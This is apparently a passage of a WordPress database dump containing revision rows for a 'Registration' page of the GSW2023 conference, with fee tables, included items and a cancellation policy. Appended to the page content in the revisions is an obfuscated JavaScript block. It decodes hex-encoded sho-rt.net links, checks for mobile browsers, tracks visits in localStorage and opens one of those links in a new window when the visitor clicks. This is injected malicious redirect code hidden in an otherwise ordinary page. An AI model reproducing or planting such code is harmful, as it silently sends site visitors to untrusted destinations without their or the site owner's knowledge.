_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:16:05','2022-10-09 01:16:05','',2638,'https://gsw2023.com/?p=2649',0,'revision','',0),
(2650,1,'2022-10-09 01:20:50','2022-10-09 01:20:50','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h2><strong><span style=\"font-size: 14px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h2>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6>Entry to all sessions/workshops;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Entry to the Exhibition;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Copy of Final Programme;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Lunches;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n</ul>\r\n<h5>o Accompanying person fee includes:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Entry to Opening Session;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:20:50','2022-10-09 01:20:50','',2638,'https://gsw2023.com/?p=2650',0,'revision','',0),
(2651,1,'2022-10-09 01:22:42','2022-10-09 01:22:42','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h2><strong><span style=\"font-size: 14px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h2>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6>Entry to all sessions/workshops;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Entry to the Exhibition;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Copy of Final Programme;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Lunches;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Accompanying person fee includes:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Entry to Opening Session;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 